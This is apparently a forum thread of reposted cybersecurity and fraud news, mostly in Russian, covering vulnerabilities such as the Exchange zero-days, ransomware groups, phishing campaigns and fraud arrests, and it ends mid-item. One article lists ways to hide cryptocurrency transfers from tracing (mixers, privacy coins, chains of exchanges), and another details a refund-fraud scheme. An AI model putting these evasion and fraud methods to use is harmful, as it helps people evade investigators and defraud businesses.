Связанная с подделкой запросов на стороне сервера (SSRF) уязвимость была исправлена в популярной системе для мониторинга и корреляции событий IBM QRadar SIEM. Проблема позволяла злоумышленникам отправлять запросы от имени системы, получать сведения о сетевой инфраструктуре и таким образом упрощала проведение других атак.
Ошибка получила идентификатор CVE-2020-4786 и набрала 5,4 балла по шкале оценки уязвимостей CVSS. Уязвимость затрагивала IBM QRadar SIEM версий от 7.4.2 GA до 7.4.2 Patch 1, от 7.4.0 до 7.4.1 Patch 1 и от 7.3.0 до 7.3.3 Patch 5.
Проблема была обнаружена экспертом компании Positive Technologies Михаилом Ключниковым. Он рассказывает, что при помощи этой уязвимости авторизованный злоумышленник мог отправлять запросы по некоторым протоколам от имени сервера как во внутреннюю сеть, так и во внешнюю.
«При отправке запросов во внутреннюю сеть злоумышленник может получить информацию о сетевых узлах и об их открытых портах, то есть больше узнать об этой сети. Кроме того, в некоторых случаях атакующий может эксплуатировать известные уязвимости в ПО, которое расположено во внутренней сети, что позволит ему развивать свою атаку», — объясняет эксперт.
Click to expand...
Источник: xakep.ru/2021/03/11/qradar-ssrf/
Разработчики Microsoft опубликовали внеплановые исправления для четырех 0-day уязвимостей, обнаруженных в коде почтового сервера Exchange (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065). В компании предупредили, что эти проблемы уже эксплуатируют китайские хакеры из группировки Hafnium. Чтобы атака сработала, злоумышленникам нужно лишь получить доступ к локальному серверу Microsoft Exchange через порт 443.
CVE-2021-26855 — SSRF-уязвимость, которая позволяла отправлять произвольные HTTP-запросы и обойти аутентификацию.
CVE-2021-26857 — проблема десериализации в службе Unified Messaging. Использование этого бага давало хакером возможность запускать код с правами SYSTEM на сервере Exchange. Для полноценной работы эксплоита требовались права администратора или другая уязвимость.
CVE-2021-26858 — уязвимость позволяющая записывать произвольные файлы (после аутентификации в Exchange).
CVE-2021-27065 — еще одна уязвимость для записи произвольных файлов (тоже после аутентификации в Exchange).Click to expand...
Ранее эта хак-группа атаковала разные американские организации, включая исследователей инфекционных заболеваний, юридические фирмы, высшие учебные заведения, оборонных подрядчиков, политические аналитические центры и НПО.
Новейшие атаки Hafnium были зафиксированы уже в 2021 году, и они эксплуатировали все четыре уязвимости нулевого дня в Exchange. Хакеры использовали эти баги как звенья в цепочке эксплоитов, которая включала в себя обход аутентификации, получение прав администратора, а затем установку веб- шелла ASPX на скомпрометированных серверах.
Закрепившись на сервере Exchange, преступники похищали содержимое почтовых ящиков и адресных книг, передавая эту информацию на свой удаленный сервер (чаще всего для этих целей использовались файлообменники, вроде Mega).
Первыми атаки на серверы своих клиентов обнаружили специалисты компании Volexity, которые уже подготовили собственный отчет об этой вредоносной кампании. Также Microsoft сообщает, что получила предупреждение об атаках и от экспертов датской фирмы Dubex.
Наряду с перечисленными выше уязвимостями в Exchange разработчики устранили и три других ошибки (CVE-2021-27078, CVE-2021-26854 и CVE-2021-26412), обнаруженные в ходе расследования инцидентов.
Инженеры Microsoft рекомендуют администраторам установить патчи как можно скорее, или хотя бы обезопасить порт 443 от возможных атак.
Источник: xakep.ru/2021/03/03/hafnium-0days/
Сотрудниками Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по городу Санкт- Петербургу и Ленинградской области задержаны двое подозреваемых в хищениях денежных средств граждан путем мошенничества.
«По версии следствия, жительница Приморья, следуя указаниям кураторов, находящихся на территории Украины, на закрытых форумах в Интернете познакомилась с техническим специалистом из Санкт-Петербурга. Тот за денежное вознаграждение создал сайт по продаже дорогостоящей техники и ежедневно с использованием специальных алгоритмов осуществлял продвижение его в поисковых системах. Кроме того, мужчина отслеживал и удалял негативные отзывы потерпевших, регистрировал новые доменные имена при блокировке предыдущих. При этом ресурс не менял свой функционал и наполнение.
На сайте был размещен онлайн-чат поддержки и номера телефонов, по которым покупатели получали консультации о характеристиках мнимого товара, а также сведения о реквизитах для оплаты. После того как клиенты производили платеж, организатор криминальной схемы переставала выходить на связь.
С целью конспирации соучастники использовали заранее зарегистрированные через прокси-серверы и СМС-активаторы мессенджеры, секретные чаты, а также учетные записи доменов на подставных лиц, в том числе не осведомленных об использовании их данных», - рассказала официальный представитель МВД России Ирина Волк.
В ходе обысков по адресам проживания задержанных изъяты мобильные телефоны, банковские и сим-карты, ноутбуки, планшет и другие предметы, имеющие доказательственное значение.
Возбуждено шесть уголовных дел по признакам преступления, предусмотренного частью второй статьи 159 УК РФ, которые соединены в одно производство.
«Имеются основания полагать, что сообщники могут быть причастны к серии аналогичных преступлений. В отношении жительницы Приморья избрана мера пресечения в виде заключения под стражу. Ее сообщник находится под подпиской о невыезде и надлежащем поведении. Предварительное расследование продолжается»,
Интерпол [сообщил](https://www.interpol.int/News-and- Events/News/2022/Nigerian-cybercrime-fraud-11-suspects-arrested-syndicate- busted) о международной операции Falcon II, в ходе которой были задержаны 11 интернет-мошенников, включая нескольких членов BEC-группировки SilverTerrier (она же TMT), существовавшей с 2019 года.
Термином BEC-атаки (Business Email Compromise) называют случаи, когда злоумышленники начинают переписку с сотрудником компании с целью завоевать его доверие и убедить выполнить действия, идущие во вред интересам компании или ее клиентам. Зачастую для этого используются взломанные аккаунты сотрудников или адреса, которые визуально похожи на официальные адреса компании, но отличаются на несколько символов.
Операция была проведена объединенными усилиями Глобальной рабочей группы Интерпола по борьбе с финансовым преступлениями и правоохранительных органов Нигерии, а также при участии ряда частных ИБ-компаний, включая Group-IB и Palo Alto Networks.
Эксперты Group-IB р[ассказывают](https://www.group-ib.ru/media/interpol-gib- falcon-ii/), что операция стала продолжением более ранней [Falcon I](https://www.interpol.int/News-and-Events/News/2020/Three-arrested-as- INTERPOL-Group-IB-and-the-Nigeria-Police-Force-disrupt-prolific-cybercrime- group), проведенной Интерполом, Group-IB и полицией Нигерии в ноябре 2020 года. Тогда было задержано трое преступников, предположительно имеющих отношение к группе ТМТ, которой приписывается компрометация 500 000 email- адресов государственных и частных компаний компаний по всему миру. Расследование продолжалось, и часть киберпреступников, выявленных Group-IB, на тот момент оставались на свободе.
Сообщается, что эксперты Group-IB в Сингапуре внесли существенный вклад в обе операции, поделившись информацией об участниках группы SilverTerrier, идентифицировав инфраструктуру злоумышленников, собрав цифровые доказательства совершенных преступлений и данные, идентифицирующие их личности.
Операция Falcon II длилась 10 дней (с 13 по 22 декабря), и для задержания преступников полиция Нигерии отправила 10 своих сотрудников из штаб-квартиры, расположенной в столице страны Абудже, в города Лагос и Асаба.
В пресс-релизе Интерпола подчеркивается, что после криминалистического анализа данных, извлеченных из телефонов и компьютеров подозреваемых, изъятых во время обысков, было обнаружено, что 11 человек связаны с атаками на более чем 50 000 целей.
Так, у одного из задержанных на ноутбуке хранилось более 800 000 учетных данных потенциальных жертв. Другой арестованный отслеживал коммуникации между 16 компаниями и их клиентами и перенаправлял все их денежные переводы на счета, принадлежащие группе SilverTerrier. Еще один хакер участвовал в кампаниях по компрометации электронной почты, направленных против организаций из Западной Африки, в том числе из Нигерии, Гамбии и Ганы.
Серверы Microsoft SharePoint пополнили длинный список устройств, которые вымогатели используют как средство проникновения в корпоративные сети. Также в этот список входят шлюзы Citrix, балансировщики F5 BIG-IP, почтовые серверы Microsoft Exchange, а также продукты VPN Pulse Secure, Fortinet и Palo Alto Network.
Эксперты Trend Micro пишут, что серверы SharePoint атакует хак-группа, известная как Hello или WickrMe Ransomware (используют учетные записи Wickr для обмена сообщениями и переговоров о выкупе). Эти злоумышленники были обнаружены исследователями в конце 2020 года.
Как правило, атаки группировки строятся на использовании эксплоита для уже исправленной уязвимости CVE-2019-0604 , представляющей угрозу для серверов совместной работы Microsoft SharePoint. Баг позволяет получить контроль над сервером SharePoint и установить веб-шелл, который затем используется для установки маяка Cobalt Strike (бэкдора) и запуска автоматизированных скриптов PowerShell, которые в конечном итоге загружают и устанавливают в зараженную систему конечный пейлоад — вымогатель Hello.

Первые атаки злоумышленников, в которых они использовали SharePoint в качестве вектора проникновения, были обнаружены в январе 2021 года компанией Pondurance, а теперь TrendMicro сообщает, что эти атаки продолжают до сих пор. При этом неясно, сами ли хакеры взламывают уязвимые серверы SharePoint или просто арендуют доступ к уже взломанным машинам у других злоумышленников, что в наши дни является обычной практикой для вымогателей.
Источник: xakep.ru/2021/04/28/cve-2019-0604/
Group-IB предупредила Facebook о масштабной атаке на пользователей Facebook Messenger в 84 странах мира, включая Россию. Специалисты Group-IB Digital Risk Protection обнаружили 5700 мошеннических рекламных публикаций и около 1 000 поддельных профилей социальной сети, которые использовались в данной кампании.
Впервые эксперты зафиксировали данную мошенническую схему летом 2020 года — злоумышленники распространяли ссылки на скачивание несуществующего «обновления» для Facebook Messenger. В апреле 2021 года число фейковых постов в Facebook, предлагающих установить «последнее обновление» мессенджера, достигло 5700. Атаке подверглись пользователи из 84 стран мира, в том числе России, Европы, Азии, региона MEA, Северной и Южной Америки.
Чтобы усыпить бдительность пользователей, мошенники использовали в аккаунтах, с которых распространялись сообщения, названия, созвучные популярному мессенджеру: Messanger, Meseenger, Masssengar и так далее, а в качестве аватары загружали официальную иконку приложения. В самих рекламных публикациях говорилось о новых функциях мессенджера, как реальных, так и вымышленных — например, предлагали скачать несуществующую Gold-версию мессенджера.

В самом сообщении содержалась короткая ссылка, созданная с помощью сервисов linktr.ee, bit.ly, cutt.us, cutt.ly, rb.gy, однако, перейдя по ней, пользователи попадали на фишинговый сайт с фиктивной формой для авторизации. В итоге жертва рисковала потерять доступ к своему аккаунту, а также «слить» другие свои персональные данные — номер телефона и электронную почту. В дальнейшем они могут быть использованы преступниками для вымогательства, рассылки спама или проданы на хакерских форумах.
«Злоумышленники не только умело играют на человеческих чувствах — любопытство, страх, жажда наживы, но и используют технологии продвижения, обхода модерации и маскировки своих мошеннических схем. Для того чтобы выявить эти схемы и защитить пользователей, бренды должны на несколько шагов опережать злоумышленников, выявить и заблокировать всю мошенническую цепочку — от начала до конца, а решения для защиты от цифровых рисков могут стать в этом случае “серебряной пулей”», — говорит Андрей Бусаргин, заместитель генерального директора Group-IB по направлению защиты от цифровых рисков.
Click to expand...
Источник: xakep.ru/2021/04/20/fake-facebook-messenger/
Компания Nvidia борется с дефицитом видеокарт, который усугубляют не только пандемия и нехватка компонентов, но и майнеры, ведь из-за роста курсов добыча криптовалюты снова стала весьма выгодным делом. Для этого в вышедших в феврале 2021 года картах GeForce RTX 3060 принудительно ухудшили майнинговую производительность. Хешрейт для добычи Ethereum был занижен в два раза.
В начале марта, после того как карты поступили в продажу, стало известно, что ограничение можно обойти. Так, японское издание PC Watch подтверждало, что китайские энтузиасты добились от RTX 3060 скорости примерно 50 Мхеш/сек для Ethereum. Так как других криптовалют ограничение не касается, на RTX 3060, к примеру, все равно можно майнить Conflux с хешрейтом примерно 45 Мхеш/сек.
Как выяснилось теперь, обход ограничений для Ethereum, это и вовсе вина самой Nvidia. Дело в том, что компания случайно сняла ограничения, выпустив новый драйвер для разработчиков (бета-версия Nvidia 470.05).
«Драйвер для разработчиков по ошибке включал код, используемый для внутренней разработки, он удаляет ограничитель скорости хэширования на RTX 3060 в некоторых конфигурациях, — признали в компании и добавили, что сейчас этот драйвер уже удален.
Click to expand...
Разумеется, удаление драйвера с сайта уже вряд ли поможет, так как скачать его успели множество людей, и эту версию по-прежнему легко найти в интернете.
Интересно, что в прошлом месяце представитель Nvidia Брайан Дель Риццо писал в Twitter, что дело не просто в драйвере: «это безопасный хендшейк между драйвером, чипом RTX 3060 и BIOS (прошивкой), который предотвратит удаление ограничителя хешрейта».
Источник: xakep.ru/2021/03/17/nvidia-mining-fail/
Недавняя кибератака на Украине усилила в Киеве опасения, что Москва замышляет поддержать вторжение на Украину с помощью взломов, хотя некоторые эксперты по- прежнему озадачены намерениями Кремля.
Виктор Жора заместитель председателя государственной службы специальной связи и защиты информации Украины по вопросам цифрового развития, цифровой трансформации и цифровизации сообщил что на прошлой неделе хакеры взломали сайты более 70 госорганов. По его словам более тревожным является то, что хакеры также установили деструктивное программное обеспечение "очистителя" предназначенное для вывода компьютерных систем из строя по крайней мере в двух государственных учреждениях. И первые признаки взлома относятся к концу 2021 года.
Россия отрицает свою причастность к кибератакам.
По словам экспертов, атака готовилась как минимум несколько недель, а может и больше. Данные от американской технологической компании Cisco Systems Inc. показывают, что программное обеспечение присутствовало в некоторых сетях еще раньше. Первоначально Cisco проследила вторжение до ноября 2021. По словам Мэтью Олни директора Cisco по разведке угроз и пресечению в четверг 20-ого января компания заявила что новый анализ данных показал, что оно могло начаться в конце лета.
В свою очередь агентство по кибербезопасности и безопасности инфраструктуры(CISA) предупредило во вторник 18-ого января что обнаружение программного обеспечения Wiper, получившего название WhisperGate от американской технологической компании Microsoft Corp. вызывает особую тревогу, поскольку предыдущие вспышки этого типа программного обеспечения вызывали сбои во всем мире.
Британская королева Елизавета II решила усилить сетевую защиту членов своей
семьи после докладов спецслужб о том, что в глазах хакеров Виндзоры являются
"объектом повышенного внимания"
Казначей королевы Майкл Стивенс считает, что любой взлом аккаунтов королевской
семьи может привести к репутационному ущербу, штрафам или судебным искам
против членов династии Елизаветы II и членов персонала.
В марте 2021 года королева назначила на пост первого директора по
информационной безопасности Эллиота Аткинса, чтобы предотвратить онлайн-атаки.
Ведется также работа по повышению уровня знаний персонала королевской семьи о
кибербезопасности.
Today, Apple has released security updates that fix two actively exploited iOS zero-day vulnerabilities in the Webkit engine used by hackers to attack iPhones, iPads, iPods, macOS, and Apple Watch devices.
"Apple is aware of a report that this issue may have been actively exploited,"
the company said in multiple
security advisories published today.
Webkit is Apple's browser rendering engine that is required to be used by all
mobile web browsers in iOS and other applications that render HTML, such as
Apple Mail and the App Store.
These vulnerabilities are tracked as CVE-2021-30665 and CVE-2021-30663, and
both allow arbitrary remote code execution (RCE) on vulnerable devices simply
by visiting a malicious website.
RCE vulnerabilities are considered the most dangerous as they allow attackers to target vulnerable devices and execute commands on them remotely.
CVE-2021-30665 was discovered by Yang Kang, zerokeeper, and Bian Liang of Qihoo 360 ATA, while CVE-2021-30663 was reported to Apple by a researcher who wishes to remain anonymous.
The list of affected devices includes:
The zero-days were addressed by Apple earlier today in the iOS 14.5.1, iOS 12.5.3, macOS Big Sur 11.3.1, and the watchOS 7.4.1 updates.
iOS
14.5.1 update
This update also resolved a bug that prevented users from seeing App Tracking
Transparency prompts within apps.
"This update fixes an issue with App Tracking Transparency where some users who previously disabled Allow Apps to Request to Track in Settings may not receive prompts from apps after re-enabling it," stated Apple in their iOS 14.5.1 release notes.
Apple has been dealing with a stream of actively exploited zero-day vulnerabilities over the past few months, with one fixed in macOS last month and numerous other iOS vulnerabilities fixed in the previous months.
A cybercriminal announced on Sunday afternoon, the 4th, the sale of three databases containing, according to him, records of more than 174 million subscribers of three Brazilian telephone operators: Vivo, TIM and Claro. The price has not been revealed and the author of the ad has placed a ProtonMail email address for the negotiations. There is, for now, no contact on Telegram or any other messaging application.
According to the announcement, the total size of the databases would be 10.2 GB. The three bases, according to the advertiser, contain a total of exactly 174,366,527 records, divided as follows:
Of course: 48,711,135 records
Alive: 104,603,006 records
TIM: 21,052,386 records
США внедрит киберармию в свои военные подразделения
К 2030 году армия США удвоит численность своих киберподразделений , поскольку Пентагон готовится к будущим боям с высококвалифицированными киберпротивниками. Численность групп Cyber Mission Force повысится до 6000 человек. Количество сотрудников подразделений армии, резервистов и Нацгвардии увеличится с 5000 до 7000 человек.
«Вы будете и дальше наблюдать рост нашего киберотдела по мере того, как мы будем расширять кибернетические деятельность и возможности», — заявил генерал-лейтенант армии Джон Моррисон .
Click to expand...
Армия США запросила $16,6 млрд. на средства киберзащиты и улучшение IT-систем. Основная часть инвестиций составляет около $9,8 млрд. и предназначена для военной IT-системы, которая является приоритетом модернизации. Около $2 млрд. выделено на наступательные и оборонительные кибероперации, а также на исследования и разработки в области кибербезопасности.
Общий бюджет в размере $178 млрд. направлен на поддержание многопрофильной целевой группы, которая способна выполнять операции в киберпространстве. В конечном итоге ожидается 5 оперативных групп. IT-директор армии Радж Айер заявил, что 2023 год — это «переломный год» в цифровой трансформации. 2023 год — время перехода службы от старой и удобной к новой и выгодной.
«Мы должны убедиться, что инвестиции должным образом согласованы с
приоритетами армии и с приоритетами Министерства обороны посредством
публикации стратегии национальной обороны», — добавил Айер.
Ранее стало известно, что армия США тестирует боевые очки Microsoft HaloLens .
Microsoft выделила $1,3 млрд. на тесты очков в боевых условиях.
source: arcyber.army.mil | api.army.mil/e2/c/downloads/2021/01/13/fc6c1449/ltg-morrison-g-6-bio-2020.pdf
Риэлтор из американского города Брандентон (штат Флорида) оказался мошенником, сумевшим украсть у дизайнерского бренда спортивной одежды Lululemon почти 200 тысяч долларов. По данным WFLA, 55-летний Марк Тилли (Mark Tilley) реализовал схему, которая позволяла ему не только получать возвраты денег за купленные товары, но и оставлять себе сами покупки.
Следователи выяснили, что Тилли размещал онлайн-заказы на сайте производителя одежды, используя при этом несколько кредитных карт и имена разных получателей. Все они должны были прийти на разные адреса в одном и том же жилом комплексе, в котором у самого Тилли была квартира. К большинству заказов риэлтор оставлял одинаковый номер телефона и не пользовался VPN-сервисами, благодаря чему силовики точно знают количество заказов, совершенных с IP- адреса Тилли.
Как только заказы отправляли получателю, мошенник менял адрес доставки на свой арендованный офис, откуда их и забирал. Но, получив товары, Тилли вытаскивал одежду, оформлял экспресс-возвраты и отправлял в Lululemon пустые коробки. Как только возвращаемая посылка сканировалась в киоске самообслуживания USPS, он получал возврат на электронную подарочную карту.
После этого Тилли возвращал ворованную одежду в обычные физические магазины сети в разных штатах, получая повторное возмещение. Таким образом, суммарный ущерб, нанесенный предприимчивым риэлтором с октября 2022 года по апрель 2023-го, составил около 200 тысяч долларов. В связи с этим ему предъявлено обвинение в краже в крупном размере.
source: wfla.com/news/sarasota-county/bradenton-realtor-steals-200k-worth-of- lululemon-clothes-in-fraud-scheme-documents-allege
• В РФ нет официального регламента об отслеживании транзакций в блокчейне.
• Идеального способа полной анонимизации криптовалютных переводов не существует.
• Усложнить идентификацию отправителя можно.
26 октября ФСБ РФ предъявила обвинение жителю Советской Гавани Хабаровского края в государственной измене, сообщает ТАСС со ссылкой на спецслужбу. По версии следствия, 54-летний Александр Вечирко финансировал ВСУ через криптовалюту.
Правозащитники сообщают, что это первое уголовное дело в РФ за госизмену через криптовалюту.
Что известно о ситуации?
Вечирко родился в Виннице, позже получил российское гражданство. В 2020 году он числился сотрудником компании «Дальтрансуголь». В последние годы Вечирко был прописан в Петербурге и Владивостоке. Как упоминает «Дождь» данная информация получена «из слитых баз данных».
Когда именно был осуществлен предположительный донат на нужды Украины неизвестно, однако о задержании мужчины стало известно в июне 2023 года:
fsb.ru/fsb/press/message/single.htm!id=10439750@fsbMessage.html
Click to expand...
Как утверждает ФСБ, Вечирко через проживающих в Украине посредников перевел криптовалюту «на счет иностранного благотворительного фонда для приобретения ВСУ беспилотных летательных аппаратов, тепловизионных прицелов, боеприпасов и медицинского обмундирования».
После задержания его поместили в московское СИЗО, где он находится до сих пор.
Как вышли на жертвователя?
Пресс-релиз ФСБ не раскрывает дополнительных деталей дела. Неизвестно, в какой криптовалюте осуществлялся донат и публиковал ли Вечирко где-либо данные о своих кошельках.
Правоохранители могли вести наблюдение за мужчиной и его соцсетями, либо узнать о криптоадресах после осмотра его компьютеров, телефонов и гаджетов, рассуждает глава общественной организации «Роскомсвобода» Артем Козлюк.
Доступ к последним, по его словам, значительно упрощается, если пользователь не использует шифрование на устройствах, не устанавливает двухфакторную аутентификацию и ведет чувствительную переписку в незащищенных мессенджерах.
Несмотря на то, что транзакции никак не поименованы, выявить принадлежность кошелька конкретному лицу позволяют инструменты блокчейн-анализа. Если биржа централизованная, пользователь при регистрации проходят обязательную KYC- процедуру, указывая свои паспортные данные.
В дальнейшем эта информация становится доступна для провайдеров KYT. Кроме того, они делают разметку адресов по уровню безопасности, основываясь на происхождении активов на нем.
В РФ на текущий момент никакого официального регламента об отслеживании транзакций в блокчейне, отмечает основатель юридической компании GMT Legal Андрей Тугарин:
«Существующие решения регламентированы неофициальными внутренними правилами конкретного ведомства, в данном случае ФСБ. Силовые структуры уже не могут игнорировать оборот криптовалют».
Уполномоченным органом в этом случае выступает Росфинмониторинг, который обязан отслеживать финансовые преступления и обмениваться информацией с другими заинтересованными ведомствами.
В 2021 году ведомство разработало сервис по анализу криптовалют «Прозрачный блокчейн» и сейчас активно применяет его в своей деятельности.
Как обезопасить свои криптовалютные транзакции?
Идеального способа для полной анонимизации криптовалютных переводов не существует. Компании по информационной безопасности научились вычислять кошельки террористов и даже опытных хакеров. Но некоторые шаги могут значительно усложнить отслеживание цифровых активов, объясняет CCO HAPI Марк Лецюк.
В первую очередь, это использование криптовалютных миксеров.
Во-вторых, переход на анонимные монеты типа Monero или псевдоанонимные, как Zcash и Dash. Настроить анонимные транзакции можно и в других блокчейнах, например, в Litecoin при помощи функции MimbleWimble.
Третьим вариантом является создание цепочки из нескольких бирж:
«Депозитный адрес у каждого аккаунта разный, а вывод средств идет уже из кластера биржи. Распутать переводы пользователя между двумя платформами сложно, особенно если выбирать конкурирующие компании или не имеющие в представительства в РФ — это такой же миксер только централизованный», — отмечает Лецюк.
Таким же образом будет работать перевод средств через обменники — пользователь переводит средства посреднику в одной сети, а от него они уже поступают конечному получателю в другой монете.
«Можно найти доверенное лицо, которое находится за границей и чей кошелек не является публичным. И через него переслать деньги нужному получателю», — добавляет эксперт.
Ни HAPI, ни их коллеги не ведут отдельной статистики донатов, поступивших в Украину из РФ. По мнению Лецюка, это может быть в том числе связано как раз со сложностью отслеживания таковых.
«Тот, кто хочет донатить по-настоящему, находит способы скрыть свою личность и замаскировать свои действия», — резюмирует он.
Напомним, в марте финразвездка РФ заявила о слежке за владельцами криптовалют совместно с МВД, ФСБ и Следственным комитетом. На тот момент ведомство контролировало транзакции с биткоином и еще 20 активами в отношении более 25 000 пользователей.
Власти Малайзии пресекли крупную мошенническую схему с криптовалютами, нацеленную на граждан Японии. В ходе рейдов на два элитных объекта недвижимости в Куала-Лумпуре полиция арестовала 21 человека.
Среди подозреваемых оказались 16 граждан Китая, женщина из Лаоса, житель Гонконга, мужчина из Мьянмы и один малайзиец. По данным прокуратуры, предполагаемые мошенники находили людей через популярные платформы знакомств Tinder и Monsters, убеждая потенциальных жертв инвестировать в криптовалюты. Злоумышленники заманивали их в поддельные приложения Bitbank и CoinCheck.
Мошенники «орудовали» из бунгало, защищенных высокими заборами и расположенных в отдаленных районах. Полиция выслеживала преступников около месяца. Во время обысков правоохранители конфисковали 55 телефонов, 17 компьютеров и других электронных устройств, использовавшихся для проведения мошеннической операции.
Местный подозреваемый уже освобожден под залог, поскольку срок его содержания под стражей истек 25 августа. Остальные 20 человек еще не выпущены на свободу. Власти расследуют дело по статье 420 Уголовного кодекса Малайзии о мошенничестве. Точная сумма потерь, которые понесли пострадавшие от инвестиций в мошенническую криптосхему, пока не сообщается.
Житель американского штата Цинциннати признал себя виновным в краже личных данных и покупке с их помощью 37 единиц боевого оружия, которые он приобретал и оплачивал в онлайне. Еще 19 заявок оказались безуспешными.
Следствие выяснило, что в июне и июле 2022 года Зефанайя Джонс (Zephaniah Jones) оплатил карточками трех человек 14 пистолетов Glock, 11 пистолетов FN Five-Seven и шесть пистолетов FN 509 общей стоимостью 15 тысяч долларов. Некоторые из этих стволов уже после покупки всплывали по различным делам. Остальное оружие он приобрел в другие промежутки времени.
Кроме того, еще в 2020 году Джонс подал успешную заявку в программу защиты заработной платы, представившись владельцем собственной компании. Тогда он стал богаче на 21 тысячу долларов. Обвинение запросило для американца 6,5 года заключения.
В последние месяцы внимание специалистов компании Intrinsec привлекла группа 3AM (ThreeAM), новый игрок на арене киберпреступности, который показал тесные связи с синдикатом Conti и группировкой Royal.
Новаторские методы шантажа и утечки данных
Уникальной чертой 3AM является их новаторская тактика шантажа. Группировка распространяет информацию об утечке данных через социальные сети жертв, используя ботов для отправки сообщений официальным аккаунтам на платформе X, указывая на утечки данных.
Прямая связь с Conti и Royal ransomware
Первые сообщения о деятельности 3AM появились в сентябре, когда команда Symantec обнаружила переход злоумышленников к использованию программного обеспечения ThreeAM после неудачной попытки развертывания вредоносного ПО LockBit. Дальнейшие исследования выявили, что ThreeAM, скорее всего, связана с группой Royal, которая переименовалась в Blacksuit и состоит из бывших членов группы Team 2 в рамках синдиката Conti.
Технические доказательства и анализ инфраструктуры
Специалисты Intrinsec обнаружили значительное пересечение в каналах коммуникации, инфраструктуре и TTPs (Tactics, Techniques, and Procedures) между 3AM и Conti. Отслеживая IP-адрес, указанный Symantec как индикатор компрометации (185.202.0[.]111), исследователи нашли PowerShell-скрипт для запуска Cobalt Strike, который был обнаружен еще в 2020 году. Кроме того, была замечена активность, похожая на деятельность программы-вымогателя Zeon, а также использование вредоносного ПО IcedID, ранее применяемой группами XingLocker и Conti для доставки вредоносного ПО.
Исследователи также обнаружили, что HTML-содержимое сайта утечки данных 3AM в
сети Tor было проиндексировано платформой Shodan для серверов, подключенных к
интернету, что означает, что оно было доступно через обычный веб. Cайт утечки
данных 3AM в сети Tor показывает список из 19 жертв, которые не заплатили
выкуп и чьи данные были опубликованы. Удивительно, что сайт 3AM очень
напоминает сайт утечек группировки LockBit.
Связь с литовской компанией Cherry Servers
Исследователи также обнаружили связь между 3AM и серверами литовской компании Cherry Servers. Отличительной особенностью было использование одинаковых портов, протоколов и версий продуктов Apache на 27 серверах компании.
Cherry Servers — это хостинговая компания, которая имеет относительно низкий риск мошенничества, но исследователи обнаружили, что клиенты компании размещали на серверах инструмент Cobalt Strike. Помимо этого, домены на анализируемых IP-адресах имели TLS-сертификаты от Google Trust Services LLC и были перенесены в Cloudflare.
Инновации в социальных сетях
Команда Intrinsec обнаружила, что 3AM, вероятно, тестировала новую тактику шантажа с использованием автоматизированных ответов в X*, чтобы распространять новости об успешных атаках. Такая тактика была применена только в одном случае с жертвой 3AM, что говорит о ее ограниченной эффективности.
Несмотря на то, что группировка ThreeAM кажется менее сложной подгруппой Royal, её нельзя недооценивать из-за потенциала проведения большого количества атак. Это подчеркивает постоянно меняющуюся природу киберпреступности и сложность отслеживания участников конкретных групп или связывания их с операциями.
Ирина Дилкинска помогла отмыть миллионы долларов через подставные фирмы.
Жительница Болгарии была экстрадирована в США , чтобы предстать перед судом по делу о мошенничестве и отмывании денег финансовой пирамиды OneCoin.
41-летняя Ирина Дилкинска была главой отдела юридического комплаенса в OneCoin и предположительно помогла OneCoin отмыть миллионы долларов незаконных доходов через подставные компании.
OneCoin была создана Ружей Игнатовой в 2014 году, которая остается на свободе после того, как в 2017 году была обвинена в мошенничестве и отмывании денег. ФБР даже предлагает вознаграждение в размере $100 000 за информацию, которая приведет к ее аресту. Другой соучредитель OneCoin, Карл Гринвуд, признал себя виновным по аналогичным обвинениям в декабре в Нью-Йорке.
Прокуроры заявили, что OneCoin позиционировалась как «цифровая валюта, которая основана на криптографии», как аналог системы Биткойн. Однако у OneCoin отсутствуют элементы, присущие криптовалютам, в том числе нет технологии блокчейна.
Компания из Софии, Болгария, использовала глобальный многоуровневый (сетевой) маркетинг (MLM) для привлечения клиентов. Тем не менее, по состоянию на ноябрь 2019 года компания продолжала привлекать новых клиентов. По разным оценкам, по всему миру в пирамиду было вложено от €4 до 15 млрд.
По словам прокуроров, работа Дилкинской в OneCoin заключалась в оказании помощи «в создании и управлении подставными компаниями с целью отмывания доходов OneCoin и удержания имущества, принадлежащего Игнатовой». Одним из примеров была схема отмывания около $400 млн. доходов OneCoin «через серию поддельных инвестиционных фондов Каймановых островов», управляемая Марком Скоттом, юристом, который был осужден в 2019 году за банковское мошенничество и отмывание денег.
По словам прокуроров, Дилкинска использовала подставную компанию под названием «B&N Consult EEOD», которая «не приносила законного дохода» и использовалась исключительно для отмывания средств OneCoin.
Власти Болгарии и отдел уголовных расследований Службы внутренних доходов США
оказали помощь в деле Дилкинской. Мошенничество с использованием электронных
средств и обвинения в отмывании денег влекут за собой максимальное наказание в
виде 20 лет лишения свободы.
source: justice[.]gov/usao-sdny/pr/bulgarian-woman-charged-role-multi-billion-
dollar-cryptocurrency-pyramid-scheme-onecoin
• Актриса дубляжа Алёна Андронова подала иск против "Тинькофф Банка" на 5,96
млн рублей.
• Андронова требует компенсацию морального вреда и обязать банк удалить её
голос с сторонних сайтов.
• Актриса озвучила текст для "Тинькофф Банка" в 2019 году, голос был
использован для обучения нейросети.
• Голос Андроновой доступен на сайте банка и озвучивает игровые трансляции,
эротические чаты и рекламу.
• Банк отрицает нарушение прав актрисы и предлагает денежную компенсацию.
• Андронова вместе с другими актёрами дубляжа и Союзом дикторов России
планирует добиваться законодательной защиты голосов.
• Петиция предлагает защищать голос гражданина наравне с изображением и
запретить использование записи голоса для синтеза речи без явного указания
целей записи.

другими актерами и дикторами добивается защиты от ИИ ](https://www.comnews.ru/content/228519/2023-08-31/2023-w35/aktrisa-dublyazha- trebuet-banka-tinkoff-6-mln-rubley-i-vmeste-drugimi-akterami-i-diktorami- dobivaetsya-zaschity-ii)
Актриса дубляжа Алёна Андронова, как сообщил онлайн-ресурс IXBT, подала в суд иск против "Тинькофф Банка" и требует 5960000 рублей, включая 5 млн компенсации морального вреда.
www.comnews.ru
47-летний Джордж Угочукву Эгвумба из Сайпресса и 33-летний Принсвелл Аринзе Дуру из Сакраменто были приговорены калифорнийскими судами к более чем 10 годам лишения свободы за участие в нигерийской киберпреступной кампании. Оба мужчины были признаны виновными в отмывании денег и мошенничестве еще в июне этого года.
Согласно заявлению правоохранительных органов, арестованные калифорнийцы являются лишь двумя из 80 подозреваемых, обвиняемых в серии преступлений, в результате которой у различных жертв было похищено не менее $6 млн. Известно, что большая часть злоумышленников находится в Нигерии и использует посредников для связи со своими американскими сообщниками.
Чаще всего нигерийские мошенники занимались следующим:
